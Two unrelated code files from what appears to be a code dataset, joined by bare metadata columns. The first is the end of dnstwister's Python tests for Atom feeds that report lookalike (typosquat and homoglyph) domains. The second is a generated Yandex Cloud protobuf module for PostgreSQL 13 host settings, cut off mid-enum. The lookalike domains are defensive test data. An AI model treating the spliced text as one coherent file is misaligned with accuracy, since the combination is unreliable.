<id>updated:wwwexa.mple.com:127.0.0.1:127.0.0.2:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e6578616d706c652e636f6d" />
<author>
<name>dnstwister</name>
</author>
<content type="html"><h1>IP: 127.0.0.1 &gt; 127.0.0.2</h1>
<a href="https://dnstwister.report/analyse/7777776578612e6d706c652e636f6d">analyse</a></content>
</entry>
<entry xml:base="http://localhost:80/atom/7777772e6578616d706c652e636f6d">
<title type="text">DELETED: www.eeexample.com</title>
<id>deleted:www.eeexample.com:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e6578616d706c652e636f6d" />
<author>
<name>dnstwister</name>
</author>
</entry>
<entry xml:base="http://localhost:80/atom/7777772e6578616d706c652e636f6d">
<title type="text">DELETED: www2.example.com.au</title>
<id>deleted:www2.example.com.au:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e6578616d706c652e636f6d" />
<author>
<name>dnstwister</name>
</author>
</entry>
</feed>
""").strip()
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_feed_reading_is_tracked(self):
"""Tests that reading a feed is logged."""
repository = dnstwister.repository
domain = 'www.example.com'
b64domain = base64.b64encode(domain)
# Read dates are None by default
read_date = repository.delta_report_last_read(domain)
assert read_date is None
# Registering a feed will update the read date
repository.register_domain(domain)
self.app.get('/atom/{}'.format(b64domain)).follow()
read_date = repository.delta_report_last_read(domain)
assert type(read_date) is datetime.datetime
# Manually set the date to an older date so we don't have to 'sleep'
# in the test.
repository.mark_delta_report_as_read(
domain, datetime.datetime(2000, 1, 1, 0, 0, 0)
)
# Clear the webapp cache
dnstwister.cache.clear()
# Reading a feed will update the read date
read_date = repository.delta_report_last_read(domain)
self.app.get('/atom/{}'.format(b64domain)).follow()
read_date2 = repository.delta_report_last_read(domain)
assert read_date2 > read_date
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_unregister_tidies_database(self):
"""Tests that you can unregister domains."""
repository = dnstwister.repository
domain = 'www.example.com'
b64domain = base64.b64encode(domain)
assert not repository.is_domain_registered(domain)
assert repository.db.data == {}
repository.register_domain(domain)
self.app.get('/atom/{}'.format(b64domain)).follow()
repository.update_delta_report(
domain, {
'new': [('www.examp1e.com', '127.0.0.1')],
'updated': [],
'deleted': [],
},
)
assert repository.is_domain_registered(domain)
assert repository.db.data != {}
repository.unregister_domain(domain)
assert not repository.is_domain_registered(domain)
assert repository.db.data == {}
# TODO: Update to pytest-style.
class TestAtomUnicode(unittest.TestCase):
"""Tests of the atom feed behaviour, with a Unicode domain."""
def setUp(self):
"""Set up the app for testing."""
# Create a webtest Test App for use
self.app = flask.ext.webtest.TestApp(dnstwister.app)
# Clear the webapp cache
dnstwister.cache.clear()
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_new_feed(self):
"""Tests the registration of a new feed - currently disabled."""
repository = dnstwister.repository
# We need a domain to get the feed for.
domain = u'www.\u0454xample.com'
# A feed is registered by trying to load it (and it not already being
# registered).
with pytest.raises(webtest.app.AppError) as err:
res = self.app.get('/atom/{}'.format(tools.encode_domain(domain)))
assert '404 NOT FOUND' in err.value.message
assert 'New RSS feed generation currently disabled.' in err.value.message
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_updated_and_deleted_items_appear_in_rss(self):
"""Tests that updated and deleted items in delta reports appear in the
RSS.
"""
repository = dnstwister.repository
# We need a domain to get the feed for.
domain = u'www.\u0454xample.com'
# We can calculate a delta though.
update_date = datetime.datetime(2016, 2, 28, 11, 10, 34)
repository.update_delta_report(
domain, {
'new': [('www.examp1e.com', '127.0.0.1')],
'updated': [(u'www\u0454xa.mple.com', '127.0.0.1', '127.0.0.2')],
'deleted': [u'www.\u0454xampl\u0454.com', 'www2.example.com.au'],
},
update_date
)
# Clear the webapp cache
dnstwister.cache.clear()
repository.register_domain(domain)
res = self.app.get('/atom/{}'.format(tools.encode_domain(domain)))
assert str(res) == textwrap.dedent("""
Response: 200 OK
Content-Type: application/atom+xml; charset=utf-8
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title type="text">dnstwister report for www.\xd1\x94xample.com (www.xn--xample-9uf.com)</title>
<id>http://localhost:80/atom/7777772e786e2d2d78616d706c652d3975662e636f6d</id>
<updated>2016-02-28T11:10:34Z</updated>
<link href="http://localhost:80/search/7777772e786e2d2d78616d706c652d3975662e636f6d" />
<link href="http://localhost:80/atom/7777772e786e2d2d78616d706c652d3975662e636f6d" rel="self" />
<generator>Werkzeug</generator>
<entry xml:base="http://localhost:80/atom/7777772e786e2d2d78616d706c652d3975662e636f6d">
<title type="text">NEW: www.examp1e.com</title>
<id>new:www.examp1e.com:127.0.0.1:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e786e2d2d78616d706c652d3975662e636f6d" />
<author>
<name>dnstwister</name>
</author>
<content type="html"><h1>IP: 127.0.0.1</h1>
<a href="https://dnstwister.report/analyse/7777772e6578616d7031652e636f6d">analyse</a></content>
</entry>
<entry xml:base="http://localhost:80/atom/7777772e786e2d2d78616d706c652d3975662e636f6d">
<title type="text">UPDATED: www\xd1\x94xa.mple.com (xn--wwwxa-d2e.mple.com)</title>
<id>updated:xn--wwwxa-d2e.mple.com:127.0.0.1:127.0.0.2:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e786e2d2d78616d706c652d3975662e636f6d" />
<author>
<name>dnstwister</name>
</author>
<content type="html"><h1>IP: 127.0.0.1 &gt; 127.0.0.2</h1>
<a href="https://dnstwister.report/analyse/786e2d2d77777778612d6432652e6d706c652e636f6d">analyse</a></content>
</entry>
<entry xml:base="http://localhost:80/atom/7777772e786e2d2d78616d706c652d3975662e636f6d">
<title type="text">DELETED: www.\xd1\x94xampl\xd1\x94.com (www.xn--xampl-91ef.com)</title>
<id>deleted:www.xn--xampl-91ef.com:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e786e2d2d78616d706c652d3975662e636f6d" />
<author>
<name>dnstwister</name>
</author>
</entry>
<entry xml:base="http://localhost:80/atom/7777772e786e2d2d78616d706c652d3975662e636f6d">
<title type="text">DELETED: www2.example.com.au</title>
<id>deleted:www2.example.com.au:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e786e2d2d78616d706c652d3975662e636f6d" />
<author>
<name>dnstwister</name>
</author>
</entry>
</feed>
""").strip()
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_feed_reading_is_tracked(self):
"""Tests that reading a feed is logged."""
repository = dnstwister.repository
domain = u'www.\u0454xample.com'
get_param = tools.encode_domain(domain)
# Read dates are None by default
read_date = repository.delta_report_last_read(domain)
assert read_date is None
# Registering a feed will update the read date
repository.register_domain(domain)
self.app.get('/atom/{}'.format(get_param))
read_date = repository.delta_report_last_read(domain)
assert type(read_date) is datetime.datetime
# Manually set the date to an older date so we don't have to 'sleep'
# in the test.
repository.mark_delta_report_as_read(
domain, datetime.datetime(2000, 1, 1, 0, 0, 0)
)
# Clear the webapp cache
dnstwister.cache.clear()
# Reading a feed will update the read date
read_date = repository.delta_report_last_read(domain)
self.app.get('/atom/{}'.format(get_param))
read_date2 = repository.delta_report_last_read(domain)
assert read_date2 > read_date
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_unregister_tidies_database(self):
"""Tests that you can unregister domains."""
repository = dnstwister.repository
domain = u'www.\u0454xample.com'
get_param = tools.encode_domain(domain)
assert not repository.is_domain_registered(domain)
assert repository.db.data == {}
repository.register_domain(domain)
repository.update_delta_report(
domain, {
'new': [('www.examp1e.com', '127.0.0.1')],
'updated': [],
'deleted': [],
},
)
assert repository.is_domain_registered(domain)
assert repository.db.data != {}
repository.unregister_domain(domain)
assert not repository.is_domain_registered(domain)
assert repository.db.data == {}
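# Illustrative aside (not part of the test module above): the opaque ids in the
# expected feed URLs are simply the hex encoding of the (IDNA-encoded) domain,
# which is what tools.encode_domain appears to produce. In Python 3 terms:
#
#   assert 'www.example.com'.encode('ascii').hex() == \
#       '7777772e6578616d706c652e636f6d'
#   assert 'www.xn--xample-9uf.com'.encode('ascii').hex() == \
#       '7777772e786e2d2d78616d706c652d3975662e636f6d'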
| 43.835938
| 145
| 0.595675
| 1,908
| 16,833
| 5.187631
| 0.126834
| 0.004849
| 0.03334
| 0.023641
| 0.913417
| 0.885734
| 0.874621
| 0.861285
| 0.845322
| 0.836027
| 0
| 0.118809
| 0.277966
| 16,833
| 383
| 146
| 43.950392
| 0.695573
| 0.106636
| 0
| 0.808824
| 0
| 0.058824
| 0.540146
| 0.152045
| 0
| 0
| 0
| 0.005222
| 0.099265
| 1
| 0.044118
| false
| 0
| 0.040441
| 0
| 0.091912
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67f0b45fe3b23d31d877bb9115bb3fa1da43fa74
| 66,953
|
py
|
Python
|
yandex/cloud/mdb/postgresql/v1/config/host13_pb2.py
|
korsar182/python-sdk
|
873bf2a9b136a8f2faae72e86fae1f5b5c3d896a
|
[
"MIT"
] | 36
|
2018-12-23T13:51:50.000Z
|
2022-03-25T07:48:24.000Z
|
yandex/cloud/mdb/postgresql/v1/config/host13_pb2.py
|
korsar182/python-sdk
|
873bf2a9b136a8f2faae72e86fae1f5b5c3d896a
|
[
"MIT"
] | 15
|
2019-02-28T04:55:09.000Z
|
2022-03-06T23:17:24.000Z
|
yandex/cloud/mdb/postgresql/v1/config/host13_pb2.py
|
korsar182/python-sdk
|
873bf2a9b136a8f2faae72e86fae1f5b5c3d896a
|
[
"MIT"
] | 18
|
2019-02-23T07:10:57.000Z
|
2022-03-28T14:41:08.000Z
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: yandex/cloud/mdb/postgresql/v1/config/host13.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import wrappers_pb2 as google_dot_protobuf_dot_wrappers__pb2
from yandex.cloud import validation_pb2 as yandex_dot_cloud_dot_validation__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='yandex/cloud/mdb/postgresql/v1/config/host13.proto',
package='yandex.cloud.mdb.postgresql.v1.config',
syntax='proto3',
serialized_options=b'\n)yandex.cloud.api.mdb.postgresql.v1.configZTgithub.com/yandex-cloud/go-genproto/yandex/cloud/mdb/postgresql/v1/config;postgresql',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n2yandex/cloud/mdb/postgresql/v1/config/host13.proto\x12%yandex.cloud.mdb.postgresql.v1.config\x1a\x1egoogle/protobuf/wrappers.proto\x1a\x1dyandex/cloud/validation.proto\"\xd8.\n\x16PostgresqlHostConfig13\x12=\n\x18recovery_min_apply_delay\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x33\n\x0eshared_buffers\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x31\n\x0ctemp_buffers\x18\x03 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12-\n\x08work_mem\x18\x04 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x34\n\x0ftemp_file_limit\x18\x05 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x44\n\x13\x62\x61\x63kend_flush_after\x18\x06 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-2048\x12I\n\x16old_snapshot_threshold\x18\x07 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x0c\xfa\xc7\x31\x08-1-86400\x12@\n\x1bmax_standby_streaming_delay\x18\x08 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12o\n\x14\x63onstraint_exclusion\x18\t \x01(\x0e\x32Q.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.ConstraintExclusion\x12;\n\x15\x63ursor_tuple_fraction\x18\n \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12J\n\x13\x66rom_collapse_limit\x18\x0b \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x10\xfa\xc7\x31\x0c\x31-2147483647\x12J\n\x13join_collapse_limit\x18\x0c \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x10\xfa\xc7\x31\x0c\x31-2147483647\x12l\n\x13\x66orce_parallel_mode\x18\r \x01(\x0e\x32O.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.ForceParallelMode\x12\x63\n\x13\x63lient_min_messages\x18\x0e \x01(\x0e\x32\x46.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogLevel\x12`\n\x10log_min_messages\x18\x0f \x01(\x0e\x32\x46.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogLevel\x12g\n\x17log_min_error_statement\x18\x10 \x01(\x0e\x32\x46.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogLevel\x12?\n\x1alog_min_duration_statement\x18\x11 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x33\n\x0flog_checkpoints\x18\x12 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0flog_connections\x18\x13 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x36\n\x12log_disconnections\x18\x14 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x30\n\x0clog_duration\x18\x15 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12l\n\x13log_error_verbosity\x18\x16 \x01(\x0e\x32O.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogErrorVerbosity\x12\x32\n\x0elog_lock_waits\x18\x17 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x61\n\rlog_statement\x18\x18 \x01(\x0e\x32J.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogStatement\x12\x33\n\x0elog_temp_files\x18\x19 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x13\n\x0bsearch_path\x18\x1a \x01(\t\x12\x30\n\x0crow_security\x18\x1b \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12y\n\x1d\x64\x65\x66\x61ult_transaction_isolation\x18\x1c \x01(\x0e\x32R.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.TransactionIsolation\x12\x36\n\x11statement_timeout\x18\x1d \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x31\n\x0clock_timeout\x18\x1e \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12H\n#idle_in_transaction_session_timeout\x18\x1f \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12_\n\x0c\x62ytea_output\x18 \x01(\x0e\x32I.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.ByteaOutput\x12Z\n\txmlbinary\x18! \x01(\x0e\x32G.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.XmlBinary\x12Z\n\txmloption\x18\" \x01(\x0e\x32G.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.XmlOption\x12;\n\x16gin_pending_list_limit\x18# \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x35\n\x10\x64\x65\x61\x64lock_timeout\x18$ \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12>\n\x19max_locks_per_transaction\x18% \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x43\n\x1emax_pred_locks_per_transaction\x18& \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12/\n\x0b\x61rray_nulls\x18\' \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x65\n\x0f\x62\x61\x63kslash_quote\x18( \x01(\x0e\x32L.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.BackslashQuote\x12\x35\n\x11\x64\x65\x66\x61ult_with_oids\x18) \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x39\n\x15\x65scape_string_warning\x18* \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x38\n\x14lo_compat_privileges\x18+ \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12?\n\x1boperator_precedence_warning\x18, \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x39\n\x15quote_all_identifiers\x18- \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12?\n\x1bstandard_conforming_strings\x18. \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x38\n\x14synchronize_seqscans\x18/ \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x39\n\x15transform_null_equals\x18\x30 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x31\n\rexit_on_error\x18\x31 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\rseq_page_cost\x18\x32 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x36\n\x10random_page_cost\x18\x33 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x35\n\x11\x65nable_bitmapscan\x18\x36 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x32\n\x0e\x65nable_hashagg\x18\x37 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0f\x65nable_hashjoin\x18\x38 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x34\n\x10\x65nable_indexscan\x18\x39 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x38\n\x14\x65nable_indexonlyscan\x18: \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0f\x65nable_material\x18; \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x34\n\x10\x65nable_mergejoin\x18< \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0f\x65nable_nestloop\x18= \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x32\n\x0e\x65nable_seqscan\x18> \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12/\n\x0b\x65nable_sort\x18? \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x32\n\x0e\x65nable_tidscan\x18@ \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x45\n\x14max_parallel_workers\x18\x41 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1024\x12P\n\x1fmax_parallel_workers_per_gather\x18\x42 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1024\x12\x10\n\x08timezone\x18\x43 \x01(\t\x12I\n\x18\x65\x66\x66\x65\x63tive_io_concurrency\x18\x44 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1000\x12M\n\x14\x65\x66\x66\x65\x63tive_cache_size\x18\x45 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x12\xfa\xc7\x31\x0e\x30-549755813888\"\x9a\x01\n\x13\x43onstraintExclusion\x12$\n CONSTRAINT_EXCLUSION_UNSPECIFIED\x10\x00\x12\x1b\n\x17\x43ONSTRAINT_EXCLUSION_ON\x10\x01\x12\x1c\n\x18\x43ONSTRAINT_EXCLUSION_OFF\x10\x02\x12\"\n\x1e\x43ONSTRAINT_EXCLUSION_PARTITION\x10\x03\"\x92\x01\n\x11\x46orceParallelMode\x12#\n\x1f\x46ORCE_PARALLEL_MODE_UNSPECIFIED\x10\x00\x12\x1a\n\x16\x46ORCE_PARALLEL_MODE_ON\x10\x01\x12\x1b\n\x17\x46ORCE_PARALLEL_MODE_OFF\x10\x02\x12\x1f\n\x1b\x46ORCE_PARALLEL_MODE_REGRESS\x10\x03\"\x92\x02\n\x08LogLevel\x12\x19\n\x15LOG_LEVEL_UNSPECIFIED\x10\x00\x12\x14\n\x10LOG_LEVEL_DEBUG5\x10\x01\x12\x14\n\x10LOG_LEVEL_DEBUG4\x10\x02\x12\x14\n\x10LOG_LEVEL_DEBUG3\x10\x03\x12\x14\n\x10LOG_LEVEL_DEBUG2\x10\x04\x12\x14\n\x10LOG_LEVEL_DEBUG1\x10\x05\x12\x11\n\rLOG_LEVEL_LOG\x10\x06\x12\x14\n\x10LOG_LEVEL_NOTICE\x10\x07\x12\x15\n\x11LOG_LEVEL_WARNING\x10\x08\x12\x13\n\x0fLOG_LEVEL_ERROR\x10\t\x12\x13\n\x0fLOG_LEVEL_FATAL\x10\n\x12\x13\n\x0fLOG_LEVEL_PANIC\x10\x0b\"\x99\x01\n\x11LogErrorVerbosity\x12#\n\x1fLOG_ERROR_VERBOSITY_UNSPECIFIED\x10\x00\x12\x1d\n\x19LOG_ERROR_VERBOSITY_TERSE\x10\x01\x12\x1f\n\x1bLOG_ERROR_VERBOSITY_DEFAULT\x10\x02\x12\x1f\n\x1bLOG_ERROR_VERBOSITY_VERBOSE\x10\x03\"\x8a\x01\n\x0cLogStatement\x12\x1d\n\x19LOG_STATEMENT_UNSPECIFIED\x10\x00\x12\x16\n\x12LOG_STATEMENT_NONE\x10\x01\x12\x15\n\x11LOG_STATEMENT_DDL\x10\x02\x12\x15\n\x11LOG_STATEMENT_MOD\x10\x03\x12\x15\n\x11LOG_STATEMENT_ALL\x10\x04\"\xe6\x01\n\x14TransactionIsolation\x12%\n!TRANSACTION_ISOLATION_UNSPECIFIED\x10\x00\x12*\n&TRANSACTION_ISOLATION_READ_UNCOMMITTED\x10\x01\x12(\n$TRANSACTION_ISOLATION_READ_COMMITTED\x10\x02\x12)\n%TRANSACTION_ISOLATION_REPEATABLE_READ\x10\x03\x12&\n\"TRANSACTION_ISOLATION_SERIALIZABLE\x10\x04\"[\n\x0b\x42yteaOutput\x12\x1c\n\x18\x42YTEA_OUTPUT_UNSPECIFIED\x10\x00\x12\x14\n\x10\x42YTEA_OUTPUT_HEX\x10\x01\x12\x18\n\x14\x42YTEA_OUTPUT_ESCAPED\x10\x02\"R\n\tXmlBinary\x12\x1a\n\x16XML_BINARY_UNSPECIFIED\x10\x00\x12\x15\n\x11XML_BINARY_BASE64\x10\x01\x12\x12\n\x0eXML_BINARY_HEX\x10\x02\"X\n\tXmlOption\x12\x1a\n\x16XML_OPTION_UNSPECIFIED\x10\x00\x12\x17\n\x13XML_OPTION_DOCUMENT\x10\x01\x12\x16\n\x12XML_OPTION_CONTENT\x10\x02\"\x9a\x01\n\x0e\x42\x61\x63kslashQuote\x12\x1f\n\x1b\x42\x41\x43KSLASH_QUOTE_UNSPECIFIED\x10\x00\x12\x13\n\x0f\x42\x41\x43KSLASH_QUOTE\x10\x01\x12\x16\n\x12\x42\x41\x43KSLASH_QUOTE_ON\x10\x02\x12\x17\n\x13\x42\x41\x43KSLASH_QUOTE_OFF\x10\x03\x12!\n\x1d\x42\x41\x43KSLASH_QUOTE_SAFE_ENCODING\x10\x04\x42\x81\x01\n)yandex.cloud.api.mdb.postgresql.v1.configZTgithub.com/yandex-cloud/go-genproto/yandex/cloud/mdb/postgresql/v1/config;postgresqlb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_wrappers__pb2.DESCRIPTOR,yandex_dot_cloud_dot_validation__pb2.DESCRIPTOR,])
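# Illustrative usage sketch (not an edit to the generated code above): the
# message class built from this descriptor is used like any protobuf message,
# with google.protobuf wrapper types for the optional scalar fields named in
# the serialized descriptor (e.g. shared_buffers, work_mem). The numeric
# values below are placeholders.
#
#   from yandex.cloud.mdb.postgresql.v1.config import host13_pb2
#   from google.protobuf import wrappers_pb2
#   cfg = host13_pb2.PostgresqlHostConfig13(
#       shared_buffers=wrappers_pb2.Int64Value(value=134217728),
#       work_mem=wrappers_pb2.Int64Value(value=4194304))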
_POSTGRESQLHOSTCONFIG13_CONSTRAINTEXCLUSION = _descriptor.EnumDescriptor(
name='ConstraintExclusion',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.ConstraintExclusion',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='CONSTRAINT_EXCLUSION_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CONSTRAINT_EXCLUSION_ON', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CONSTRAINT_EXCLUSION_OFF', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CONSTRAINT_EXCLUSION_PARTITION', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=4599,
serialized_end=4753,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_CONSTRAINTEXCLUSION)
_POSTGRESQLHOSTCONFIG13_FORCEPARALLELMODE = _descriptor.EnumDescriptor(
name='ForceParallelMode',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.ForceParallelMode',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='FORCE_PARALLEL_MODE_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FORCE_PARALLEL_MODE_ON', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FORCE_PARALLEL_MODE_OFF', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FORCE_PARALLEL_MODE_REGRESS', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=4756,
serialized_end=4902,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_FORCEPARALLELMODE)
_POSTGRESQLHOSTCONFIG13_LOGLEVEL = _descriptor.EnumDescriptor(
name='LogLevel',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogLevel',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG5', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG4', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG3', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG2', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG1', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_LOG', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_NOTICE', index=7, number=7,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_WARNING', index=8, number=8,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_ERROR', index=9, number=9,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_FATAL', index=10, number=10,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_PANIC', index=11, number=11,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=4905,
serialized_end=5179,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_LOGLEVEL)
_POSTGRESQLHOSTCONFIG13_LOGERRORVERBOSITY = _descriptor.EnumDescriptor(
name='LogErrorVerbosity',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogErrorVerbosity',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='LOG_ERROR_VERBOSITY_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_ERROR_VERBOSITY_TERSE', index=1, number=1,
serialized_options=None,
